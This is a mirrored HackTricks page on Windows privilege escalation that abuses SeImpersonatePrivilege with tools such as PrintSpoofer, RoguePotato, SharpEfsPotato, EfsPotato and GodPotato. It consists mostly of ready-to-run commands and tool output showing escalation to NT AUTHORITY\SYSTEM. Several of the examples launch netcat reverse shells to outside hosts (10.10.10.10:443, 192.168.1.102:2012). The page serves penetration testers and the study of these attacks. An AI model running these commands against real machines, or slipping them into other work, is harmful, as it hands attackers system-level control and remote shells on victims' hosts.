mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-18 17:16:10 +00:00
129 lines
6.2 KiB
Markdown
129 lines
6.2 KiB
Markdown
# RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato
|
|
|
|
{% hint style="success" %}
|
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|
|
|
|
{% hint style="warning" %}
|
|
**JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,** [**EfsPotato**](https://github.com/zcgonvh/EfsPotato)**,** [**DCOMPotato**](https://github.com/zcgonvh/DCOMPotato)** can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works.
|
|
{% endhint %}
|
|
|
|
## Quick Demo
|
|
|
|
### PrintSpoofer
|
|
|
|
```bash
|
|
c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"
|
|
|
|
--------------------------------------------------------------------------------
|
|
|
|
[+] Found privilege: SeImpersonatePrivilege
|
|
|
|
[+] Named pipe listening...
|
|
|
|
[+] CreateProcessAsUser() OK
|
|
|
|
NULL
|
|
|
|
```
|
|
|
|
### RoguePotato
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999
|
|
# In some old versions you need to use the "-f" param
|
|
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999
|
|
```
|
|
{% endcode %}
|
|
|
|
### SharpEfsPotato
|
|
|
|
```bash
|
|
> SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
|
|
SharpEfsPotato by @bugch3ck
|
|
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
|
|
|
|
Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
|
|
|
|
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2
|
|
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
|
|
[x]RpcBindingSetAuthInfo failed with status 0x6d3
|
|
[+] Server connected to our evil RPC pipe
|
|
[+] Duplicated impersonation token ready for process creation
|
|
[+] Intercepted and authenticated successfully, launching program
|
|
[+] Process created, enjoy!
|
|
|
|
C:\temp>type C:\temp\w.log
|
|
nt authority\system
|
|
```
|
|
|
|
### EfsPotato
|
|
|
|
```bash
|
|
> EfsPotato.exe "whoami"
|
|
Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).
|
|
Part of GMH's fuck Tools, Code By zcgonvh.
|
|
CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net]
|
|
|
|
[+] Current user: NT Service\MSSQLSERVER
|
|
[+] Pipe: \pipe\lsarpc
|
|
[!] binding ok (handle=aeee30)
|
|
[+] Get Token: 888
|
|
[!] process with pid: 3696 created.
|
|
==============================
|
|
[x] EfsRpcEncryptFileSrv failed: 1818
|
|
|
|
nt authority\system
|
|
```
|
|
|
|
### GodPotato
|
|
|
|
```bash
|
|
> GodPotato -cmd "cmd /c whoami"
|
|
# You can achieve a reverse shell like this.
|
|
> GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
|
|
```
|
|
|
|
### DCOMPotato
|
|
|
|
![image](https://github.com/user-attachments/assets/a3153095-e298-4a4b-ab23-b55513b60caa)
|
|
|
|
|
|
## References
|
|
|
|
* [https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)
|
|
* [https://github.com/itm4n/PrintSpoofer](https://github.com/itm4n/PrintSpoofer)
|
|
* [https://github.com/antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato)
|
|
* [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato)
|
|
* [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
|
|
* [https://github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato)
|
|
* [https://github.com/zcgonvh/DCOMPotato](https://github.com/zcgonvh/DCOMPotato)
|
|
|
|
|
|
{% hint style="success" %}
|
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|
|
|